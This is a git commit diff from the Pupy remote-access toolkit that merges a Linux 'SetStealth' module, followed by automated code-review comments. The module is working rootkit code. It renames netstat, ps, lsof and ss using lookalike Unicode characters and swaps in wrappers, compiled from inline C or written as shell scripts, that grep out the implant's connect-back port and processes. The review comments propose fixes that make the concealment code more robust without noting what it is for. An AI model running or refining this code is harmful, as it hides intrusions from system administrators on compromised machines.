Merge branch 'RedSunEmpire-master' into dev

This commit is contained in:
n1nj4sec 2016-05-03 18:13:10 +02:00
commit 5d72cfaac5
2 changed files with 54 additions and 48 deletions


@ -1,31 +1,23 @@
#!/usr/bin/env python #!/usr/bin/env python
from pupylib.PupyModule import * from pupylib.PupyModule import *
from pupylib.utils.rpyc_utils import redirected_stdio
__class_name__="SetStealth" __class_name__="SetStealth"
def print_callback(data):
sys.stdout.write(data)
sys.stdout.flush()
@config(cat="manage", compat="unix") @config(compat="linux", cat="manage")
class SetStealth(PupyModule): class SetStealth(PupyModule):
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
Demo: https://vimeo.com/157356150"""
********************** /!\ WARNING /!\ ********************** dependencies=["linux_stealth"]
* Do NOT run the stealh module more than ONCE on a machine. *
* Running it two times will brake the binaries. *
*************************************************************
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.') self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
def is_compatible(self):
a,r=super(SetStealth, self).is_compatible()
if not a:
return False, r
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
return False, "It looks like this module has already been run on this machine."
return True, ""
def run(self, args): def run(self, args):
self.client.load_package("linux_stealth") with redirected_stdio(self.client.conn):
self.client.conn.modules['linux_stealth'].run(str(args.port)) self.client.conn.modules['linux_stealth'].run(args.port)
self.success("Module executed successfully.") self.success("Module executed successfully.")
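Review bot: The new `--port` option in init_argparse drops the old `type=int`, so `args.port` is now whatever string the operator typed (or None) and run() forwards it unconverted to the remote `linux_stealth.run`, which in the other file concatenates it into command text; keep the integer validation and convert at the call site as the old code did, e.g. `self.arg_parser.add_argument('--port', type=int, default=None, help='The port number to which Pupy is connecting to.')` and `self.client.conn.modules['linux_stealth'].run(None if args.port is None else str(args.port))`. The class docstring also loses the sentence that the script must run with root privileges and the warning that running the module twice breaks the replaced binaries, while the `is_compatible` guard that enforced the second point is deleted in the same hunk and nothing in the change lifts either constraint; at minimum the root-privilege sentence should be restored to the docstring so the argparse description still states it.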


@ -1,18 +1,31 @@
#!/usr/bin/env python #!/usr/bin/env python
import os import sys
import subprocess import subprocess
import os
import time import time
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def run(port): def run(port=None):
if port is None:
try:
import pupy
host, port=pupy.get_connect_back_host().split(":")
except:
raise Exception("pupy connect back port couldn't be found, please precise it manually")
print "hidding port %s ..."%port
a=subprocess.check_output(["netstat", "-tn"])
if port in a:
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
if cmd_exists("gcc") == True: if cmd_exists("gcc") == True:
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
#subprocess.call(bash, shell=True)
with open('/tmp/b', 'w') as f: with open('/tmp/b', 'w') as f:
f.write(bash) f.write(bash)
f.close()
os.system("bash /tmp/b") os.system("bash /tmp/b")
time.sleep(3) time.sleep(3)
os.remove("/tmp/b") os.remove("/tmp/b")
@ -20,6 +33,7 @@ def run(port):
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
with open("/tmp/p", "w") as f: with open("/tmp/p", "w") as f:
f.write(bash) f.write(bash)
f.close()
os.system("bash /tmp/p") os.system("bash /tmp/p")
time.sleep(3) time.sleep(3)
os.remove("/tmp/p") os.remove("/tmp/p")
@ -30,7 +44,7 @@ def run(port):
os.system("mv "+path+"ss "+path+"zss") os.system("mv "+path+"ss "+path+"zss")
with open(path+"ss", "w") as newss: with open(path+"ss", "w") as newss:
newss.write(bashss) newss.write(bashss)
newss.close()
os.system("chmod +x "+path+"ss") os.system("chmod +x "+path+"ss")
#blazo - fresh orange else:
#brock - september 22nd print "port is already hidden"
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
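Review bot: The bare `except:` in the first hunk of run(), around the `pupy.get_connect_back_host()` lookup, swallows every exception type, including the `ValueError` raised by the two-value unpack when the returned string is not exactly `host:port` (an IPv6 literal or a value without a colon), and replaces it with a message that hides the real cause; this file is Python 2 (`print` statement), so narrow it and append the original error instead, e.g. `except (ImportError, AttributeError, ValueError) as e:` / `raise Exception("pupy connect back port couldn't be found, please precise it manually (%s)" % e)`. `host` is bound on the same line but never used, so `_, port = pupy.get_connect_back_host().split(":")` would make the intent clearer. A short docstring on run() stating that `port` is a string (it is concatenated into text later in the function) and that None means "derive it from the pupy connection" would also be worthwhile, since the new default changes the contract; the remainder of run() continues past the first hunk.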